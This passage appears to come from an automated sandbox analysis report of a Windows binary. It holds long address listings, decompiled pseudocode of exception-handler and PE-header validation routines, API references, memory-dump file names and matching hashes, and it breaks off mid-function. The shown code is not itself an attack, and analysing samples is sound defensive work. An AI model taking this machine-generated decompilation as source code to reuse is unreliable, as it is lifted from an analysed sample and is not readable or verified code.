                                                                                                                                                                                                                                0x736e0638
                                                                                                                                                                                                                                0x736e063f
                                                                                                                                                                                                                                0x736e0644
                                                                                                                                                                                                                                0x736e0649
                                                                                                                                                                                                                                0x736e0649
                                                                                                                                                                                                                                0x736e0651
                                                                                                                                                                                                                                0x736e0661
                                                                                                                                                                                                                                0x736e0673
                                                                                                                                                                                                                                0x736e0685
                                                                                                                                                                                                                                0x736e0698
                                                                                                                                                                                                                                0x736e06aa
                                                                                                                                                                                                                                0x736e06b2
                                                                                                                                                                                                                                0x736e06b7
                                                                                                                                                                                                                                0x736e06bc
                                                                                                                                                                                                                                0x736e06bc
                                                                                                                                                                                                                                0x736e06c3
                                                                                                                                                                                                                                0x736e06c8
                                                                                                                                                                                                                                0x736e06c8
                                                                                                                                                                                                                                0x736e06cf
                                                                                                                                                                                                                                0x736e06d4
                                                                                                                                                                                                                                0x736e06d4
                                                                                                                                                                                                                                0x736e06db
                                                                                                                                                                                                                                0x736e06e0
                                                                                                                                                                                                                                0x736e06e0
                                                                                                                                                                                                                                0x736e06e7
                                                                                                                                                                                                                                0x736e06ec
                                                                                                                                                                                                                                0x736e06ec
                                                                                                                                                                                                                                0x736e06f6
                                                                                                                                                                                                                                0x736e06f8
                                                                                                                                                                                                                                0x736e0732
                                                                                                                                                                                                                                0x736e06fa
                                                                                                                                                                                                                                0x736e06ff
                                                                                                                                                                                                                                0x736e0723
                                                                                                                                                                                                                                0x736e072b
                                                                                                                                                                                                                                0x736e071f
                                                                                                                                                                                                                                0x736e071f
                                                                                                                                                                                                                                0x736e0735
                                                                                                                                                                                                                                0x736e073c
                                                                                                                                                                                                                                0x736e073e
                                                                                                                                                                                                                                0x736e0760
                                                                                                                                                                                                                                0x736e0768
                                                                                                                                                                                                                                0x736e076b
                                                                                                                                                                                                                                0x736e076b
                                                                                                                                                                                                                                0x736e076d
                                                                                                                                                                                                                                0x736e076d
                                                                                                                                                                                                                                0x736e0778
                                                                                                                                                                                                                                0x736e077e
                                                                                                                                                                                                                                0x736e0783
                                                                                                                                                                                                                                0x736e078a
                                                                                                                                                                                                                                0x736e07c4
                                                                                                                                                                                                                                0x736e07cf
                                                                                                                                                                                                                                0x736e07d5
                                                                                                                                                                                                                                0x736e07d8
                                                                                                                                                                                                                                0x736e07db
                                                                                                                                                                                                                                0x736e07e7
                                                                                                                                                                                                                                0x736e07ef
                                                                                                                                                                                                                                0x736e078c
                                                                                                                                                                                                                                0x736e078f
                                                                                                                                                                                                                                0x736e079b
                                                                                                                                                                                                                                0x736e07a1
                                                                                                                                                                                                                                0x736e07a7
                                                                                                                                                                                                                                0x736e07aa
                                                                                                                                                                                                                                0x736e07b3
                                                                                                                                                                                                                                0x736e07b3
                                                                                                                                                                                                                                0x736e07f2
                                                                                                                                                                                                                                0x736e0800
                                                                                                                                                                                                                                0x736e0806
                                                                                                                                                                                                                                0x736e0809
                                                                                                                                                                                                                                0x736e080e
                                                                                                                                                                                                                                0x736e0810
                                                                                                                                                                                                                                0x736e0813
                                                                                                                                                                                                                                0x736e0813
                                                                                                                                                                                                                                0x736e0818
                                                                                                                                                                                                                                0x736e081a
                                                                                                                                                                                                                                0x736e081d
                                                                                                                                                                                                                                0x736e081d
                                                                                                                                                                                                                                0x736e0822
                                                                                                                                                                                                                                0x736e0824
                                                                                                                                                                                                                                0x736e0827
                                                                                                                                                                                                                                0x736e0827
                                                                                                                                                                                                                                0x736e082c
                                                                                                                                                                                                                                0x736e082e
                                                                                                                                                                                                                                0x736e0831
                                                                                                                                                                                                                                0x736e0831
                                                                                                                                                                                                                                0x736e0836
                                                                                                                                                                                                                                0x736e0838
                                                                                                                                                                                                                                0x736e0838
                                                                                                                                                                                                                                0x736e0845
                                                                                                                                                                                                                                0x736e0848
                                                                                                                                                                                                                                0x736e087f
                                                                                                                                                                                                                                0x736e084a
                                                                                                                                                                                                                                0x736e084a
                                                                                                                                                                                                                                0x736e084d
                                                                                                                                                                                                                                0x736e0878
                                                                                                                                                                                                                                0x736e086d
                                                                                                                                                                                                                                0x736e086d
                                                                                                                                                                                                                                0x736e0881
                                                                                                                                                                                                                                0x736e0889
                                                                                                                                                                                                                                0x736e088c
                                                                                                                                                                                                                                0x736e08ab
                                                                                                                                                                                                                                0x736e08b0
                                                                                                                                                                                                                                0x736e08b0
                                                                                                                                                                                                                                0x736e08b2
                                                                                                                                                                                                                                0x736e08b7
                                                                                                                                                                                                                                0x736e08c3
                                                                                                                                                                                                                                0x736e08b9
                                                                                                                                                                                                                                0x736e08bc
                                                                                                                                                                                                                                0x736e08bc
                                                                                                                                                                                                                                0x736e08c8
                                                                                                                                                                                                                                0x736e08c8
                                                                                                                                                                                                                                0x736e088e
                                                                                                                                                                                                                                0x736e0891
                                                                                                                                                                                                                                0x736e08a0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736e08a0
                                                                                                                                                                                                                                0x736e0893
                                                                                                                                                                                                                                0x736e0896
                                                                                                                                                                                                                                0x736e0898
                                                                                                                                                                                                                                0x736e0898
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736e0896
                                                                                                                                                                                                                                0x736e084f
                                                                                                                                                                                                                                0x736e0852
                                                                                                                                                                                                                                0x736e0868
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736e0868
                                                                                                                                                                                                                                0x736e0857
                                                                                                                                                                                                                                0x736e0859
                                                                                                                                                                                                                                0x736e0859
                                                                                                                                                                                                                                0x736e0857
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736e0848
                                                                                                                                                                                                                                0x736e0745
                                                                                                                                                                                                                                0x736e0753
                                                                                                                                                                                                                                0x736e075b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736e075b
                                                                                                                                                                                                                                0x736e0749
                                                                                                                                                                                                                                0x736e074e
                                                                                                                                                                                                                                0x736e074e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736e0749
                                                                                                                                                                                                                                0x736e0706
                                                                                                                                                                                                                                0x736e0714
                                                                                                                                                                                                                                0x736e071c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736e071c
                                                                                                                                                                                                                                0x736e070a
                                                                                                                                                                                                                                0x736e070f
                                                                                                                                                                                                                                0x736e070f
                                                                                                                                                                                                                                0x736e070a

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,736E05CE,?,?,00000008,?,?,736E0262,00000000), ref: 736E0800
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                                                                                • Opcode ID: 05cb680177b5e95ff39e40ae2e72bfa2743d1e853c3dc6def163b9372af648d7
                                                                                                                                                                                                                                • Instruction ID: 0168eedf4b05a1b7499e8a4d502c259459069475ae3d95db47ad5f63623746db
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05cb680177b5e95ff39e40ae2e72bfa2743d1e853c3dc6def163b9372af648d7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBB186316216088FDB05DF29C586B957BB0FF45364F298258E89ACF2E1C335E996CF81
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8B139, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8B139(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xa8d318; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xa8d360 = 1;
										__eflags =  *0xa8d360;
										if( *0xa8d360 != 0) {
											goto L60;
										}
										_t84 =  *0xa8d318; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xa8d360 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xa8d318 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xa8d320 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xa8d31c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xa8d320 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xa8d320 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xa8d360 = 1;
							__eflags =  *0xa8d360;
							if( *0xa8d360 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xa8d320 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xa8d320 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xa8d360 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xa8d320 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xa8d318 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xa8d320 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xa8d320 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                                                                                                                                                                                                0x00a8b143
                                                                                                                                                                                                                                0x00a8b146
                                                                                                                                                                                                                                0x00a8b14c
                                                                                                                                                                                                                                0x00a8b16a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b16a
                                                                                                                                                                                                                                0x00a8b154
                                                                                                                                                                                                                                0x00a8b15d
                                                                                                                                                                                                                                0x00a8b163
                                                                                                                                                                                                                                0x00a8b172
                                                                                                                                                                                                                                0x00a8b175
                                                                                                                                                                                                                                0x00a8b178
                                                                                                                                                                                                                                0x00a8b182
                                                                                                                                                                                                                                0x00a8b182
                                                                                                                                                                                                                                0x00a8b184
                                                                                                                                                                                                                                0x00a8b187
                                                                                                                                                                                                                                0x00a8b189
                                                                                                                                                                                                                                0x00a8b189
                                                                                                                                                                                                                                0x00a8b18b
                                                                                                                                                                                                                                0x00a8b18e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b190
                                                                                                                                                                                                                                0x00a8b192
                                                                                                                                                                                                                                0x00a8b1f8
                                                                                                                                                                                                                                0x00a8b1f8
                                                                                                                                                                                                                                0x00a8b356
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b356
                                                                                                                                                                                                                                0x00a8b194
                                                                                                                                                                                                                                0x00a8b194
                                                                                                                                                                                                                                0x00a8b198
                                                                                                                                                                                                                                0x00a8b19a
                                                                                                                                                                                                                                0x00a8b19a
                                                                                                                                                                                                                                0x00a8b19a
                                                                                                                                                                                                                                0x00a8b19a
                                                                                                                                                                                                                                0x00a8b19d
                                                                                                                                                                                                                                0x00a8b19e
                                                                                                                                                                                                                                0x00a8b1a1
                                                                                                                                                                                                                                0x00a8b1a1
                                                                                                                                                                                                                                0x00a8b1a5
                                                                                                                                                                                                                                0x00a8b1a9
                                                                                                                                                                                                                                0x00a8b1b7
                                                                                                                                                                                                                                0x00a8b1b7
                                                                                                                                                                                                                                0x00a8b1bf
                                                                                                                                                                                                                                0x00a8b1c5
                                                                                                                                                                                                                                0x00a8b1c7
                                                                                                                                                                                                                                0x00a8b1c9
                                                                                                                                                                                                                                0x00a8b1d9
                                                                                                                                                                                                                                0x00a8b1e6
                                                                                                                                                                                                                                0x00a8b1ea
                                                                                                                                                                                                                                0x00a8b1ef
                                                                                                                                                                                                                                0x00a8b1f1
                                                                                                                                                                                                                                0x00a8b26f
                                                                                                                                                                                                                                0x00a8b26f
                                                                                                                                                                                                                                0x00a8b1f3
                                                                                                                                                                                                                                0x00a8b1f3
                                                                                                                                                                                                                                0x00a8b1f3
                                                                                                                                                                                                                                0x00a8b271
                                                                                                                                                                                                                                0x00a8b273
                                                                                                                                                                                                                                0x00a8b354
                                                                                                                                                                                                                                0x00a8b354
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b279
                                                                                                                                                                                                                                0x00a8b279
                                                                                                                                                                                                                                0x00a8b280
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b286
                                                                                                                                                                                                                                0x00a8b28a
                                                                                                                                                                                                                                0x00a8b2e6
                                                                                                                                                                                                                                0x00a8b2e8
                                                                                                                                                                                                                                0x00a8b2f0
                                                                                                                                                                                                                                0x00a8b2f2
                                                                                                                                                                                                                                0x00a8b2f4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b2f6
                                                                                                                                                                                                                                0x00a8b2fc
                                                                                                                                                                                                                                0x00a8b2fe
                                                                                                                                                                                                                                0x00a8b300
                                                                                                                                                                                                                                0x00a8b315
                                                                                                                                                                                                                                0x00a8b315
                                                                                                                                                                                                                                0x00a8b317
                                                                                                                                                                                                                                0x00a8b346
                                                                                                                                                                                                                                0x00a8b34d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b34d
                                                                                                                                                                                                                                0x00a8b31b
                                                                                                                                                                                                                                0x00a8b31c
                                                                                                                                                                                                                                0x00a8b31e
                                                                                                                                                                                                                                0x00a8b320
                                                                                                                                                                                                                                0x00a8b320
                                                                                                                                                                                                                                0x00a8b322
                                                                                                                                                                                                                                0x00a8b324
                                                                                                                                                                                                                                0x00a8b326
                                                                                                                                                                                                                                0x00a8b33a
                                                                                                                                                                                                                                0x00a8b33a
                                                                                                                                                                                                                                0x00a8b33d
                                                                                                                                                                                                                                0x00a8b33f
                                                                                                                                                                                                                                0x00a8b33f
                                                                                                                                                                                                                                0x00a8b340
                                                                                                                                                                                                                                0x00a8b340
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b328
                                                                                                                                                                                                                                0x00a8b328
                                                                                                                                                                                                                                0x00a8b328
                                                                                                                                                                                                                                0x00a8b331
                                                                                                                                                                                                                                0x00a8b332
                                                                                                                                                                                                                                0x00a8b334
                                                                                                                                                                                                                                0x00a8b336
                                                                                                                                                                                                                                0x00a8b336
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b328
                                                                                                                                                                                                                                0x00a8b326
                                                                                                                                                                                                                                0x00a8b302
                                                                                                                                                                                                                                0x00a8b309
                                                                                                                                                                                                                                0x00a8b309
                                                                                                                                                                                                                                0x00a8b30b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b30d
                                                                                                                                                                                                                                0x00a8b30e
                                                                                                                                                                                                                                0x00a8b311
                                                                                                                                                                                                                                0x00a8b313
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b313
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b309
                                                                                                                                                                                                                                0x00a8b28c
                                                                                                                                                                                                                                0x00a8b28f
                                                                                                                                                                                                                                0x00a8b294
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b29d
                                                                                                                                                                                                                                0x00a8b29f
                                                                                                                                                                                                                                0x00a8b2a5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b2ab
                                                                                                                                                                                                                                0x00a8b2b1
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b2b7
                                                                                                                                                                                                                                0x00a8b2b9
                                                                                                                                                                                                                                0x00a8b2c2
                                                                                                                                                                                                                                0x00a8b2c6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b2cc
                                                                                                                                                                                                                                0x00a8b2cf
                                                                                                                                                                                                                                0x00a8b2d1
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b2d8
                                                                                                                                                                                                                                0x00a8b2da
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b2dc
                                                                                                                                                                                                                                0x00a8b2e0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b2e0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b1cb
                                                                                                                                                                                                                                0x00a8b1cb
                                                                                                                                                                                                                                0x00a8b1cb
                                                                                                                                                                                                                                0x00a8b1d2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b1d4
                                                                                                                                                                                                                                0x00a8b1d5
                                                                                                                                                                                                                                0x00a8b1d7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b1d7
                                                                                                                                                                                                                                0x00a8b1ff
                                                                                                                                                                                                                                0x00a8b201
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b211
                                                                                                                                                                                                                                0x00a8b213
                                                                                                                                                                                                                                0x00a8b215
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b21b
                                                                                                                                                                                                                                0x00a8b222
                                                                                                                                                                                                                                0x00a8b24e
                                                                                                                                                                                                                                0x00a8b24e
                                                                                                                                                                                                                                0x00a8b250
                                                                                                                                                                                                                                0x00a8b252
                                                                                                                                                                                                                                0x00a8b266
                                                                                                                                                                                                                                0x00a8b268
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b254
                                                                                                                                                                                                                                0x00a8b254
                                                                                                                                                                                                                                0x00a8b254
                                                                                                                                                                                                                                0x00a8b25d
                                                                                                                                                                                                                                0x00a8b25e
                                                                                                                                                                                                                                0x00a8b260
                                                                                                                                                                                                                                0x00a8b262
                                                                                                                                                                                                                                0x00a8b262
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b254
                                                                                                                                                                                                                                0x00a8b224
                                                                                                                                                                                                                                0x00a8b224
                                                                                                                                                                                                                                0x00a8b227
                                                                                                                                                                                                                                0x00a8b229
                                                                                                                                                                                                                                0x00a8b23b
                                                                                                                                                                                                                                0x00a8b23b
                                                                                                                                                                                                                                0x00a8b23e
                                                                                                                                                                                                                                0x00a8b240
                                                                                                                                                                                                                                0x00a8b240
                                                                                                                                                                                                                                0x00a8b241
                                                                                                                                                                                                                                0x00a8b241
                                                                                                                                                                                                                                0x00a8b247
                                                                                                                                                                                                                                0x00a8b247
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b22b
                                                                                                                                                                                                                                0x00a8b22b
                                                                                                                                                                                                                                0x00a8b22b
                                                                                                                                                                                                                                0x00a8b232
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b234
                                                                                                                                                                                                                                0x00a8b234
                                                                                                                                                                                                                                0x00a8b235
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b235
                                                                                                                                                                                                                                0x00a8b237
                                                                                                                                                                                                                                0x00a8b239
                                                                                                                                                                                                                                0x00a8b24c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b24c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b239
                                                                                                                                                                                                                                0x00a8b1ab
                                                                                                                                                                                                                                0x00a8b1ae
                                                                                                                                                                                                                                0x00a8b1b1
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b1b3
                                                                                                                                                                                                                                0x00a8b1b5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b1b5
                                                                                                                                                                                                                                0x00a8b17a
                                                                                                                                                                                                                                0x00a8b17c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00A8B1EA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2850889275-0
                                                                                                                                                                                                                                • Opcode ID: 7b93a7f5997be97e91412d32938149cb7169fc72dbeabfd9192c09dcca6df15d
                                                                                                                                                                                                                                • Instruction ID: 429ec9718c789a030f202aff55c8abb9ab10c6276a71c41016b58777a2a3010a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b93a7f5997be97e91412d32938149cb7169fc72dbeabfd9192c09dcca6df15d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1461E330620606DFDB29EF29C8D4AB973A5FB55314F288228D855CF6A5E730DD42C774
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D78D7, Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                			E736D78D7(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
